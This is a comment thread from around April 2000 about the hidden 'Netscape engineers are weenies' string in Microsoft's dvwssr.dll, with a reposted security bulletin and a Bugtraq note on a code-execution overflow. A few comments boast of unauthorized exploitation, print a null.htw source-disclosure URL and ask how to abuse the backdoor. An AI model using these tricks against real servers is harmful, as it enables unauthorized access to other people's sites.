Does anyone still think the Brits are paranoid for not trusting closed source software developed in another country for use in their classified networks?
I have no idea if this particular news item is true or not but the idea is there now and I wonder how many other "must be secure" type systems will think twice about closed source. If it was not developed by the country requiring the security and/or was not open source and downloaded and built by that country, how do they know what types of backdoors are in the software?
Cav Pilot's Reference Page
UNIX - Not just for Vestal Virgins anymore
It seems funny that people working for Bill Gates would be using the word weenie.
Fight Spammers!
Re:Heaven's Gift? -- Nope (Score:3) by Hrunting (hrunting@nospam.texas.net) on Friday April 14, @07:40AM EST (#180) (User Info) http://hrunting.home.texas.net/ This is a quote from the leading online gaming source, Blue's News. There are scary implications here. When you cannot trust software made by one of the world's largest software companies, what do you do when if[sic] comes to all the little homebrew progams that are available? This is exactly the mentality that keeps open-source from advancing. As strange as it may seem, the corporate world does not see open-source software go through the same sort of rigorous QA that (they assume) corporate products go through. An event such as this is only going to serve to make people doubt more software in general and that has a negative effect on open-source software which already has to face the FUD about its quality. No, this isn't Heaven's Gift, it's Satan's Blessing. Too many people see Microsoft as the sort of God of software and when your God fails you, where do you turn? Certainly not to the meek. Why not? They're supposed to inherit the Earth, neh?
As others have already pointed out, such a backdoor should only be of any use to someone who has physical access to the machine. The implication of this article is that it is available to remote users which is highly dangerous.
NT already can be unlocked if you've managed to lock yourself out, so long as you have physical access. Go to http://www.sysinternals.com/ and check out their NT utilities page, looking for a thing called 'Locksmith'. This lets you create a boot floppy which will reset the password on the account of your choice.
It caused a stir at the time, but of course if you can boot the machine from a floppy, then you can reset passwords. If the OS on the hard disk can change a password then so can any other OS that can get access to the hard disk. Just like I can come along with a Linux boot disk, mount your hard disk and edit your password file to get root access...
Ian Griffiths
Hey cool! Next time I program I will put a whole bunch of easy syntax errors at the beginning so I won't have any errors in the rest of the code. Hmmm. If MS has been practicing this for a while I think I know why they have so many problems....
Speeding never killed anyone. Stopping did.
So if you have an admin for Human Resources department, and an admin for Sales, the sales admin can get full access to files in the HR part of the tree! Fine for me I would not mind seeing what everybody earns!!!. Microsoft orginally said this was a bug, but then said "Well if you loose your main admin, another can take his place".
Under Novell this type of security breach would would be considered very bad. Most organizations usually setup an admin account and put the login & password in a locked box in case you loose your admin, and only authorized & trusted individuals have assess to the safety account.
SubSolar
--
Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code?
You don't think the manufacturer of your security system has codes to bypass your code?
I didn't see this posted already, so here goes:
ZDNet has a copy of the original WSJ Interactive article at http://www.zdnet.com/ zdnn/stories/news/0,4586,2543490,00.html. It's much better than the anemic AP and CBS reports.
Actually, That Makes Sense, It Explains How "Support" Software like PC Anywhere And NetOp Work So Well (And How Programs Like NetBus And Back Orifice Were So Easily Created). My guess Is That There Is A Bug In It Though That Would Prevent The CIA From Taking Advantage Of It Annonymously.
`Lex - Find Me Here: Text Appeal
With a company with a long history of security flaws, should those of you living in Washington state be worried about Microsoft using prison labour. What's it going to be, 'no bars on the windows for this guy, he's Microsoft?'
Just taking a quick look, i have over 450MB of microsoft .dlls. Does this mean now that I can delete them all...I could definately use the space. Hey, and as a little aftereffect, I won't have to worry about new backdoors! What a deal!
>!pu dekcuf sreenigne tfosorciM
.sig - wish I thought of it first!
cool
!skcits-kcuf tnagorra era sreenigne tfosorciM
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
>This is a quote from the leading online gaming source, Blue's News.m ode=mboard&action=viewboard&id=12236&for mat=main"> discussion board </a>about it and looks like he got a couple comments about it. No doubt a few prople mailed him about it as well.
<p>
Looks like he's taken that editorial bit off of his site. I went to post a comment on his <a href="http://www.bluesnews.com/cgi-bin/blammo.pl?
<p>
Heaslip seems to be a pretty good guy about stuff like this. I expect to see a blurb about it in his "out of the Blue" ramble tomorrow. He generally owns up to mis-statements or foibles like this.
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
YOU SAY: Nothing really prevents a Red Hat engineer from doing something equally stupid.
Ever heard of source RPMS? You can compile a source RPM using Red Hat's exact same settings and you should get a just about byte-for-byte duplicate version.
Here's my problem.
If you were really going to install a super-secret backdoor that no-one knew about, why would you call netscape engineers 'weenies'?
I personally would pick a much more obscene term, wouldn't you?
Why did these guys show restraint? Makes you think...
- My password is slashdot
Backdoor in Microsoft Web Software This is news why? Isn't this just assumed at this point? estimated that the problem threatened "almost every Web-hosting provider." [...] This is true how? Oh, right, IIS for Linux and BSD's.
The Mongrel Dogs Who Teach
In an ideal world the programmer would create separate debug and ship versions of the software. Pieces of code for development hacks like this would all be conditional on _DEBUG being defined. So when the final version is compiled (without _DEBUG defined) they are not in the resulting binaries.
This does require more careful coding and regular checking of the release version. However there are a number of other advantages including use of Assert and the ability to perform extra checking in critical subsystems during development without taking the hit for these in the ship version.
There is a good description of this kind of programming in "Writing Solid Code" by Steve Maguire (1993). Available from all your favourite on-line computer bookstores. Don't write it off because it's Microsoft press it's by one of their old school programmers (back before they started seriously taking over the world).
Gamma Testing - Where testing is extended to the full user community (AKA Shipping the Program)
Unless the code has been carefuly written with removal in mind, or the program is thoroughly tested after the removal, there is a good chance that the removal of the cheat code logic will introduce problems. It may do so anyway but if the cheat logic were properly written as debug code then the chance of this is low.
Gamma Testing - Where testing is extended to the full user community (AKA Shipping the Program)
The FrontPage Extensions manage design-time web permissions ...
Interesting that something cut-and-pasted from MSDN (without a citation) gets modded to a 5...
To all who care below is the security bulletin from MS. Also, "Netscape Engineers are weenies," is not a password and does not work without the correct Key. The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** -----BEGIN PGP SIGNED MESSAGE----- Microsoft Security Bulletin (MS00-025) - -------------------------------------- Procedure Available to Eliminate "Link View Server-Side Component" Vulnerability Originally Posted: April 14, 2000 Summary ======= A procedure is available to eliminate a security vulnerability in several web server products. The vulnerability could allow a user who has privileges on a web server to read certain files from other web sites hosted on the same computer. Frequently asked questions regarding this vulnerability and the procedure can be found at http://www.microsoft.com/technet/security/bulletin /fq00-025.asp Issue ===== Dvwssr.dll is a server-side component used to support the Link View feature in Visual Interdev 1.0. By design, it provides .asp files to clients who have web authoring privileges on the server. However, it does not properly restrict the files that a web author can request, with the result that a user who has web authoring privileges on one web site could request .asp files from anywhere on the server, including other web sites hosted on it. However, even with this vulnerability, the component would only comply with the request if the specific file granted read access to the user. There are some significant restrictions to this vulnerability: - Only servers hosting multiple web sites could be affected by it - Only a user who has web authoring privileges for a site on the server could request a file. He would need to know the name and location of the file on the server. - The files would only be sent if their permissions granted read access to the particular user who requested them. In most cases, this would mean that the files granted read access to the Everyone group - Only .asp files (and global.asa, which is a special-case .asp file) could be retrieved. Affected Software Versions ========================== The affected component is part of Visual Interdev 1.0. However, it is a server-side component, and is included in the following products: - Windows NT 4.0 Option Pack - Personal Web Server 4.0, which ships as part of Windows 95 and 98 - Front Page 98 Server Extensions NOTE: 1. Windows 2000 is not affected by this vulnerability. Upgrading from an affected Windows NT 4.0 to Windows 2000 removes the vulnerability. 2. Installing Office 2000 Server Extensions on an affected server removes this vulnerability. 3. Installing FrontPage 2000 Server Extensions on an affected server removes this vulnerability. Remediation =========== To eliminate this vulnerability, customers who are hosting web sites should delete all copies of the file Dvwssr.dll from their servers. The FAQ provides step-by-step instructions for doing this. The only functionality lost by deleting the file is the ability to generate link views using Visual Interdev 1.0.
-- -- A truly great man never puts away the simplicity of a child
I tried it, secure internal server, didn't work.
According to ntbugtraq, a lot of sites that are misconfigured might work..
Hmm, all this kinda makes you wander what sort of mindset those Microserfs working for Micro$oft are in. Calling fellow workers "weenies" isn't very polite, is it?
"Some people see things as they are, and ask why. I dream things that never were, and ask why not."
Disclaimer: I also run a 64-user AIX box! And a couple of Linux systems, one thats getting ready to run my own customized version of slash. I actually know something about computers! So just because I run an NT box does not mean I'm one of those "Minesweeper Consultants and Solitare Experts"
No, Thursday's out. How about never - is never good for you?
But I think I agree with you there about Apache. I'm thinking move to Apache, keep NT/SQL server just as the backend database. Apache, Sendmail & SQL Server just might be the best of breed solution I'm looking for, and I wouldn't have to worry as much about NT's security flaws since it wouldn't be running the website, and the only permissions on the database would be those given to Apache. Comments and suggestions welcome.
No, Thursday's out. How about never - is never good for you?
This is the 2nd time I've had to fix a security flaw where the information was documented and a fix was posted on the web some time before MS got a clue.
Ya know, I'm probably one of the few that actually bought something from MS because I thought it was worth it. SQL and IIS performance wise really kick ass, and I'll be happy to provide some relavant links if you want to question this. NT is not 100% stable for me, but I have uptimes in the 3 month range with about 35,000 hits a day on my site. Crap like this, however, is rapidly making me a former customer of Microsoft.
No, Thursday's out. How about never - is never good for you?
I suppose that if this were Open Source, a backdoor like this would never have existed.
It seems as though one of these deliberately placed "major mistakes" happens to Microsoft every few months. I suppose that shows to the quality of their engineers.
I would also assert that this is not so suprising. After all there is one huge security hole that Microsoft will have a very hard time patching, it is a problem with every version of Microsoft Web Server, it is called Windows.
Doesn't work in the English version. However this install is a bit broken in that Windows update comes up as a blank screen.
Even if I grant your point then the back door should be stored as a properly hashed password and thus not derivable from any decompile.
If you liked this thought maybe you would find my blog nice too:
The more I think about this, (1) the more I feel it is down right criminal to stick a backdoor like this into code. This can lead to massive problems for both individuals and businesses that have data stolen (2). Look at the trouble that (3) caused (4) the credit card companies with (5) credit card number lists stolen (6) from their (7) web servers. Add on top of this, (8)(9) there were (10) fraudlent charges to people's (11) credit cards. Deliberate backdoors like this and others make it all that much easier for a cracker or script kiddie (12) to break into a system. Who knows whether (13) this was the exploit used in any of the previous security breaches. I'd bet that some used it; (14) maybe (15)not all, but some. Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code? Corrections made by the grammar police. Fifteen errors in so short a post. Well, my work is done!
Reality does not happen until you analyze the dots. -Don DeLillo (Underworld)
If this only doesnt effect FP2000, WIN2000. I wonder what sort of impact this will have on FP98 users?
It is interesting that this news comes out AFTER the newer product lines are available.Time to Pick up the Lagging Sales of Windows 2000 with a good media scare? I guess we will have to wait and see....
There's quite a lot more than just the password and global.asa in the file....
(Spudley Strikes Again!)
Did anyone find a reference to this vurnability on the MS site?
This DLL sits in one of the Frontpage server extensions folders so you would have to asume it's something to do with Frontpage.
If you scroll through the DLL a bit further, you get some stuff about it being part of "Microsoft Design Tool", whatever that is.
Anyway, everybody knew the Frontpage server extensions were completely insecure.
However, it does not indicate that open source is secure
It does make it more difficult to put backdoors in ala this MS hole, but it certainly does not make it impossible. A lot (all?) of the cryptographic routines require magic numbers. A back door could be hidden through the algorithm and these numbers. Unless someone is going to run a detailed cryptanalysis on the algorithm with the supplied numbers, there could very well be a backdoor or the encryption is a LOT weaker than it would otherwise be.
Many companies will deploy Microsoft Software, especially non technical companies, without even considering alternitives, because being Microsoft, it must be good, and a high price and unreliability of the software can be overlooked because this Microsoft software, being so expensive must have the best security/features/usability/speed Perhaps in light of this, people will start looking for substance rather than marketing hype, and once people start looking for substance, Microsoft sofware may no longer look like the most attractive option.
IF you can't beat the hell outta them Call them weenies.... To think, a large company like MS and they can't think of a better insult than weenies.... tis a sad day..
Let's just AND it with a bunch of ones, and make it completely uncrackable!
- Windows will never beat Linux in the server OS market.
- Linux will ever beat Windows on the desktop.
So here's the deal -- Microsoft takes desktop.
- Linux takes server.
If that sounds like a typical strategic business deal, well. That's how the world works! Only this time there's no official deal, but an understanding. If only it was for real. (Sigh!)--
--
mj++
Much better to go have a look at RFP's post to BugTraq.
One other comment is that M$ products frequently have reports of security holes at least as serious as this, and sometimes a lot more so. I guess this just gets the attention because it was engineered in. But, it is certainly not the only backdoor found in software. Here is a nice one here.
Parting thought, is anyone going to read this?
The crap you omitted was "XWebScope Source Retriever". Maybe it is a string which a client needs to send to microsoft's server to be able to retrieve files? Maybe in combination with the Netscape-weenies string?
I have a feeling that the entire dll is just a tiny "webserver plugin".
The system functions the dll uses are stuff like strcmp, ReadFile, CloseHandle, strlen and so on. Just enough to check for the secret passphrase and send some files. :-)
According to one source I read, the only use of the file is for ASP support for Visual Interdev version 1.0. Deleting the file will break Visual Interdev 1.0 support, not in and of itself a big deal, most people have either run away from Microsoft authoring tools, or upgraded to a recent version of FrontPage.
On the other hand, knowing Microsoft I wouldn't be surprised if the manner in which Visual Interdev support is broken is by the server crashing when a Visual Interdev 1.0 client makes a request for ASP info. This would replace the security hole with a denial of service attack.
----
----
Open mind, insert foot.
Don't blame me -- I don't even touch their software, leave alone run it.
Contrary to the popular belief, there indeed is no God.
This is why I am NOT SURPRISED that Microsoft would put in a really _dumb_ and arrogant backdoor key to their software and maintain it through ALL LEVELS of code checking, on purpose- presumably not because they were really actively planning to be able to break into their own customers' computers anytime they wanted, but 'just in case' they might want or need to do that sometime! I fail to see any other possible reason for this. Conceding that they are not the Illuminati or competing with the NSA- the only possible conclusion is that right to the highest levels, Microsoft wanted to leave their options open about someday _becoming_ like that, and so hubris leads them to stick really _stupid_ backdoors in, correctly assuming that their customers would not figure even this out (it's been how many years to figure this one out?)
The thing is, I am not surprised, so I am startled and astonished when this is suddenly getting so much attention. To me it's just another Bugtraq 'issue' because I already _thought_ Microsoft wanted to supplant the government and lay the groundwork for surveilllance and remote control of its own customers. It's old news to me- though this feeling of mine was based on intuition, as I'll happily admit, so there was no real evidence, as I would also admit.
Now there is- it's a 'smoking gun' type of revelation- and while for me it's an 'Ah, I thought so', for many people it's like waking up and realising their mother is not their mother, like she is a bloodsucking Arcturan weasel in a cheap mask. I can sympathise with their shock to some extent even though I never had much patience with their pathetic trustingness in the first place. Sorry guys. New rules.
This isn't a flaw - it's deliberate. It's no more a flaw than the flight simulator in Excel 97.
...phil
...phil
"For a list of the ways which technology has failed to improve our quality of life, press 3."
If you want to create a second way in, man, go ahead. Write a CGI script to exec sshd or something. But you don't need the maintainers of Apache to do that for you; you don't need that capability hidden from you; and you sure as hell don't need that capability being discovered in someone else's system on the other side of the globe and then exploited in yours while you are taking your first holiday in 2 years...
Backdoors, done properly, have their place. That place is not implemented unknowingly in thousands and thousands of installations worldwide where such a backdoor would be wholly unsuitable anyway.
Make no mistake. Whatever this is, it's not a feature.
Dave
(Still using mozilla 2000041316)
--
I'm not trying to downplay the significance of this. But the arrogant statement by whoever (in the Wall St. Journal article) had the gall to imply that this would affect "every web-hosting provider" has forgotten that MOST web-hosting providers aren't dumb enough to use IIS in the first place. Just check the Netcraft Survey of websites to see that Apache whose developers probably don't think of Netscape engineers as "weenies", holds a 60% (+/- 5% I'm guessing) market share in that area.
Werd.
you're assuming "corporate" software goes through a lot of QA, or for that matter adequate QA. As someone who has spent years of his life DEEP in the trenches in a software QA role at a "very corporate" software concern, let me assure you that often, the all-important bottom line trumps the QA process. Often.
I run Linux at home, several co workers do, the head of ops runs it. I have personally seen linux boxes cracked in 3 seconds. Net BSD seems quite possible though.
Any box that isn't set up properly can be cracked in 3 seconds. Unfortunatly, many distros are not set up correctly. NetBSD is a good choice though.
If, for some reason, the ssh daemon dies, I'm fucked.
If at all possable, I would set the web server up with a serial console to a second system on the site. The second system should also have a relay to trigger the reset line on the server. Nearly all problems that don't require a hardware ficx can then be handled remotely.
There's also the Weasel card that was a story here a while back.
As far as a backdoor goes, A private one that you put there yourself may be a good thing, but a global one that many people know how to access, the odds that you'll have to take a trip to the server increase rather than decrease.
Which one is going to be cheaper in the long run?
I'd say that Linux/*BSD with Apache is cheaper in the long run. Once set up, Apache is not at all difficult or time intensive to maintain. The same is true of Linux and *BSD. In the real world, I have found that with the same hardware, a Linux system will handle at least 1.5 times the load of an NT system. I don't have much experiance with *BSD, but I understand that it will similarly outperform NT.
The real issue is Frontpage. It is possable to set up Apache with Frontpage, but you are then open to any security flaws it may introduce in it's binary only parts.
As for justifying the money spent on MS licensing: To put it plainly, I cannot think of a justification for that unless some of your customers insist on an NT based server or on features unique to the MS 'solution'.
Matt. Want XML + Apache + Stylesheets? Get AxKit.
you're assuming "corporate" software goes through a lot of QA, or for that matter adequate QA.
I am not assuming this. I specifically stated that people assume this. I have a very good idea how QA general software goes through, but the mass market does not (since they still believe that the product they get is the final, highest quality version). You can mouth off all you want about how much you know, but the fact that Microsoft sells so much product and that everyone uses it tells people in general that they make a good product that everyone can use, thus when they have a screwup, it raises doubts on all of software in general
Are .dll's checksummed? If not, you could just overwrite the "Netscape" message with some gibberish of your own.
This happened in FrontPage 98. Maybe there are some plaintext backdoors in FrontPage 2000. Does anyone with that product wanna run "strings" on a few of the .dll's?
no text
--
Here's an associated press article on this:
T ORYID=APIS73RF7J80
http:// wire.ap.org/APnews/main.html?FRONTID=TECHNOLOGY&S
Sorry to weasel into a reply to the first comment here...
--
Microsoft Corp. acknowledged yesterday that its engineers included in some of its Internet software a secret password ... that could be used to gain illicit access to hundreds of thousands of Internet sites world-wide.
The manager of Microsoft's security-response center, Steve Lipner ... described such a backdoor password as "absolutely against our policy" and a firing offense for the as yet unidentified employees.
-- Don't Tase me, bro!
Doesn't anyone fricken read...it says about every Web-Hosting Provider. It doesn't say Web-Server. I run a small ISP and I got a few LinuxBoxes and 1 NT Box. The NT shit is a necessity due to corps requiring it. Who am I to complain about this? I make them sign a waver incase something like this comes around that says I'm not responsible at all for M$s problems and more secure webservers are available for cheaper hosting within my company (I charge 2x for the M$ stuff and also charge for every bit of permissions I have to change and every ODBC I have to set up...ya know stuff any gimpie could do from the terminal on Apache).
Learn to read, and don't think just because you have a box set up in the corner you are the average provider...
clif
Forgot to mention that the above is quoted from TechNet April 2000, Visual InterDev technical notes.
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
----------
'We have no choice in what we are. Yet what are we,
but the sum of our choices.' --Rob Grant
Isn't it ironic that in an attempt at insulting another software company, MS engineers demonstrate how unprofessional they themselves are?
Nope, I just exploited it on a site that I have no rights on...
c e=2
http://www.wiretrip.net/rfp/p/doc.asp?id=45&ifa
Try it yourself....
Get a life, not a lifestyle. - Hikem Bey
This post (http://slashdot.org/comments.pl?sid=00/04/14/0619 206&cid=540) has the information on the vulnerability for those curious to know what the deal is. I shoulda posted it as a reply here to begin with, but am posting this link to it because there probably aren't too many people who will make it down to the 540th post where it got buried. Sorry!
Cheers,
ZicoKnows@hotmail.com
"This is a vulnerability because it allows an author on one Web site on a shared server to see anything on another server," said Steve Lipner, manager of Microsoft's Security Response Center. "That's the extent of the vulnerability."
Skepticism is always a healthy thing, but I don't think it's unreasonable to believe that a security hole exists in a Microsoft product when Microsoft says that there is a hole! I mean, do we all have to go install IIS and verify the existence of the hole ourselves to avoid acting "foolish"?
Say due to some "bug" in the software, you get locked out of your mission critical system...
Yup, and if your users don't upgrade as quickly as your marketing plan demands (They lose an entire cycle of revenue and a chink of marketing numbers if you skip from v.1 to v.3)...
and in a couple of year the backdoor might be leaked^h^h^h^h^h^h^h discovered, and many users of your existing products will upgrade. After all, it is the fastest and simplest way to quick-fix this problem (and others that may come later)
Pretty soon, you'll have them trained: BUY THE NEW VERSION ON RELEASE. True, they may not want to install it yet (until the 'gamma testing' is over -- v2.1 or 2.2), but at least they'll have it on hand when v1.x goes up in smoke.
In this case, InterDev 1.0 *requires* the affected DLL (so the MS official fix won't work for InterDev users) and a lot of people will move to Frontpage 2000, when FP 98 (or 97) met their needs quite well until now.
If a licit and deliberate 'front door' password and verification scheme were compromised, MS would clearly be legally liable for failing to protect the password (just as you are liable if you let your corporate password get into the wrong hands) -- but if a "back door" is discovered, then they can blame it on 'evil hackers', even if their own service engineers use it routinely.
BTW, a legal front door would demand that they do more work -- e.g. verify EngineerID by modem to MS HQ or time-varying encryption -- while a back door can be a simple password, since it is never acknowledged. Any company that deliberately uses a password backdoor is guilty of negligence in today's corporate/legal environment. Do they think no service engineer will ever quit or be fired?.
__________
If you can go to bed, knowing you did a valuable thing today, you're very lucky. If you can't... it's not bedtime
The string also appears in the DLL Mtd2lv.dll, which is installed in C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\. I think is installed by Visual Studio Enterprise Edition, but this DLL is a lot bigger, namely 514Kb over 7Kb.
Does anyone know how to exploit it yet, though?
Why didn't they go over to the excel team and learn how to do easter eggs right. Replacing the 404 page with "Netscape blows goats!" would have been cool. This is moronic.
--Shoeboy
Some fast and lose numbers...
Data from the Netcraft Web Server Survey. Of a total of 13,106,190 servers surveyed about 21% are Microsoft based, or 2,742,931 servers (actual March count). Figuring an average of 2 minutes to login and delete each file at an average pay+overhead rate of $50 an hour for the web admins deleting the .dll you get a cost of about $4,571,552 just to delete the files.
The more I think about this the more I feel it is down right criminal to stick a backdoor like this into code. This can lead to massive problems for both individuals and businesses that have data stollen. Look at the trouble that was caused to the credit card companies with the stollen credit card number lists from web servers. Add on top of that the fraudlent charges to peoples credit cards. Deliberate backdoors like this and others make it all that much easier for a cracker or script kiddy to break into a system. Who knows if this was the exploit used in any of the previous security breaches. I'd bet that some used it. maby not all, but some.
Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code?
For anyone too lazy to even bother . . .
. dll s sr.dll
...... [100%]
skunk:~$
skunk:~$
skunk:~$ wget http://www.sivertsen.com/_vti_bin/_vti_aut/dvwssr
--12:06:28-- http://www.sivertsen.com:80/_vti_bin/_vti_aut/dvw
=> `dvwssr.dll'
Connecting to www.sivertsen.com:80... connected!
HTTP request sent, fetching headers... done.
Length: 6,416 [text/html]
0K ->
12:06:28 (59.11 KB/s) - `dvwssr.dll' saved [6416/6416]
skunk:~$ file dvwssr.dll
dvwssr.dll: MS Windows PE 32-bit Intel 80386 GUI DLL
skunk:~$ strings dvwssr.dll
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.idata
.rsrc
@.reloc
>%u:
D$4h
D$4j
]_^[
t*;5
D$4j
D$<"
DVWSSR.DLL
DllMain
GetExtensionVersion
HttpExtensionProc
/global.asa
.asp
!seineew era sreenigne epacsteN
HTTP/1.0 404 Object Not Found
XWebScope Source Retriever
_refresh_acls_
Content-type: text/html
KERNEL32.dll
lstrcmpiA
lstrcpynA
CloseHandle
ReadFile
CreateFileA
lstrlenA
lstrcpyA
GetModuleFileNameA
lstrcmpA
1!1-141H1O1
2q2}2
`0d0
dvwssr.dbg
ssr.dll
skunk:~$
iSKUNK!
Does Laurie Anderson know you're stealing her material? :)
Pope
It doesn't mean much now, it's built for the future.
Anyone remember Firesign Theatre's "I Think We're All Bozos on this Bus"? Remember the backdoor Clem used - "Springhead, this is worker".
Heck, I used that same sentence as the backdoor into a system I wrote -- but the customers got source and new it was there. (Further and more, you had to be already logged in at a certain privilege level before it'd be recognized.)
There are some occasions where a system needs to provide some way for a "maintenance worker" (or sysadmin) to expose certain inner workings to manipulation -- that's what the root password is all about, right?
Mind, in this case it doesn't apply: you don't keep such a hook secret from the customer, you do give them the option of changing it (with suitable warnings), and Front Page is hardly anything mission critical enough as to require that sort of access to a running system. (Plenty of other ways to access it if so.)
Running 'strings' on that DLL (buried deep within the FrontPage directories) did indeed turn up "!seineew era sreenigne epacsteN". I've found other interesting strings in MS software (eg, a copyright notice from the Regents at UCB in 'ftp.exe'). Might be interesting to run strings on all the W2K stuff, although perhaps they're more careful now about hiding such things (may they rot13'd it.)
-- Alastair
> OTOH, people here have run strings on the file and it has turned up the phrase... so...?
Best case it's just a tease and not really a password at all.
But with MS's recent PR track record, who is going to believe there's not a backdoor even if there isn't? The "NSA key" has been in the news again lately. There's a long flamewar going on in the newsgroups right now.
This could hardly come at a worse time for Microsoft.
--
Sheesh, evil *and* a jerk. -- Jade
You'd think that corperations, seeing the projects within thier very own company go through little QA and end up fairly buggy, would run away from anything produced by another corperation.
But no, time and time again they seek to buy something just because it's produced by another company with a facade of competency (and it's not just Microsoft we are talking about here).
"There is more worth loving than we have strength to love." - Brian Jay Stanley
There was a space in the URL given - the end should read CiHiliteType=Fill.
o urfile.asp%20&CiRestriction=none&CiHilit eType=Full
/. html munging code strikes again. Oh well, you can fix it by hand.
I'll try pasting in the fixed URL:
http://www.yoursite.com/null.htw?CiWebHitsFile=/y
Nope,
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Sorry, make that:
There was a space in the URL given - the end should read CiHiliteType=Full
Not "Fill"!!!
"There is more worth loving than we have strength to love." - Brian Jay Stanley
Ok, sure there's a backdoor in this dll, but what can you do with it? Is it something that can only be accessed from the console? From a webpage somehow? and what rights does the backdoor give you? As funny as I think this is (come on, the fix is "delete the file"?), it remains to be seen just how dangerous the hole really is.
No matter what license code comes under, as long as all of the source code is available (even if it's look but don't touch), problems like this will be prevented by simple code auditing and peer review.
And that's why I'd never trust a piece of Microsoft server software over Apache or Qmail for example. A lot of Microsoft software is relatively stable now (my win2k install hasnt needed rebooting in a month), but so closed and opaque that there's no way whatsoever to audit or confirm that a million backdoors aren't present. One has been found, how many others?!
No wonder MS doesn't want DOJ to open-source Windows. It would take them years to clear out all the inside-jokes, bad hacks, broken code, and cleartext backdoors. Yeesh.
So `strings d*.dll` produces something you'd find in a dictionary, therefore there's a secret backdoor and all IIS servers are unsafe and if M$loth put the wrong content up on a webserver they could trigger WW3...
.|` Clouds cross the black moonlight,
Er. Yeah, right. Next?
~Tim
--
~Tim
--
Rushing on down to the circle of the turn
FrontPage does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories that contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FrontPage manipulates content file ACLs to manage run-time security, which is the topic of the next section.
This file can only be reached and executed if you have -AUTHOR- rights to the web. If you are a smart admin, you would be hosting your sites on NTFS partitions and therefore this is not the big risk that they say it is.
The 'password' is probably visible in a sniff, or even encoded in the HTTP POST request to the extensions however you CANNOT execute the dll call it without the permissions.
In this case, you could probably make as many changes as you wanted. Just don't change the length of the string unless you're really really good at changing offsets and entry points. :)
Wow. Thankfully, I didn't find the same in the Linux Frontpage extensions. I looked in both version 3.0 for Frontpage 98 and version 4.0 for Frontpage 2000.
I can't tell you how much it drives me nuts to have to load Microsoft software on my Linux web servers. So much so that I don't even trust their setuid wrapper. Each site runs as a dummy user, which owns their files.
IIRC, it's one of the links off here.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
Just in from bugtraq....
.dll to /msadc directory, and with
From core.lists.bugtraq@CORE-SDI.COM Fri Apr 14 20:23:10 2000
Date: Fri, 14 Apr 2000 20:40:48 -0300
From: Gerardo Richarte
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web
Servers
Russ wrote (in ntbugtraq):
> Ok, here's a breaking update.
>
> Latest reports say that there is
>
> NO VULNERABILITY IN DVWSSR.DLL
>
> Yup, that's right, different again from what I said earlier, and even more
> different than what I said yesterday to WSJ.
That is not correct.
We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.
-snip-
We've been playing a little more trying to exploit this buffer overflow, and as we don't
have InterDevs installed on our IIS, we copied the
this configuration, we have been able to make the code jump to our buffer.
Under this circunstances, the actual BO allow to execute arbitrary code in the target machine.
It's interesting to note that no log is generated as efect of this attack.
-snip-
ok folks..this is almost comical...
Apparently Microsoft finds it serious enough to recommend deleting a dll and removing functionality from their product...if it WASN'T a backdoor, do you think they'd do that? After all, they can see the source code and are the only ones that know for sure how their stuff works...or maybe they are just doing it to bely fears...who knows?
CVS can be made reasonably secure with one simple change: require Kerberos authentication. This has several beneficial effects:
- CVS *knows* who the user is - there's no worries about old
.cvspassword files lying around or being cracked. - The user *knows* who the CVS server is - there's no risk of man-in-the-middle attacks.
- You can encrypt client/server traffic - nobody can modify the data stream en route.
The CVS server should also be secured, of course, but the combination of the standard Unix permissions and Kerberos telnet and ftp should be adequate to provide a fairly high level of confidence that nobody has modified the underlying RCS files directly.For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
So the question is, who is looking over their shoulders and why are they trying to preserve backdoors?
Expanding a vast wasteland since 1996.
Get it from ZDNet.
Work for Change & GET PAID!
For what it's worth, KIRO Radio (Seattle's news/talk station and CBS affiliate) reported this morning that a Microsoft spokesman -- I don't remember which one -- said that this was (paraphrasing) "a very serious breach of company policy" and "those who did it could be fired." Could be? I'll bet they're publicly hung, shot, drawn and quartered, burned at the stake, and bludgeoned to death. And then the real disciplinary action is going to start.
--
Someone you trust is one of us.
but how to use it ??
I'd love to know where to use the pwd, I'll bet lots of lame wannabe sysops 'forget' to delete the file.
---
heres a new arti cle from ZDNET with some aditional details.
Backdoors aren't always a bad thing. Hypothetical situation...
Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in? You phone tech. support and ask for help. 2 possible outcomes: Format and complete reinstall (you only last the last x hours/days/weeks work), or they send out an engineer with knowledge of a backdoor and allow you access to your system again. Personally, I'd prefer the latter of the 2 options, it's a helluva that more cost effective in the long term, and helps support of the software.
THe one downfall to this is that people MAY (not nessecarilly will) discover the backdoor and exploit it, however, if the backdoor is there, chances are there is a way to disable it (as in this case, deleting a dll file). Maybe MS did a good thing here, maybe not. WHo's to say?
- Damnit, I'm dead Jim
Microsoft abuses:
- secret backdoors (this bug)
- scour your hard drive secretly for information (Win95 registration wizard)
- break competitor's products (Windows Media Player and Real)
- fabricate evidence in a federal trial (Windows demonstration for Judge Jackson)
- convicted by a Federal judge of being a harmful monopoly
- under investigation in Europe
- over 100 civil lawsuits pending against them.
And that's just off the top of my head. Why would anyone with sensitive data (banks, government, etc...) trust them?
-Twid
- "When you want something with all your heart, the entire universe conspires to give it to you" -Paulo Coelho
I could be the only one here who things this is a great thing, but so be it. I'm referring only to the fact that they claim that the flaw identifies some Netscape employees as "weenies" not the flaw it's self.
:-)) I'm sure it wouldn't be received with such hostility. I think it's great, and I'd be flattered if MS went out of their way to describe myself or my coworkers as "weenies!"
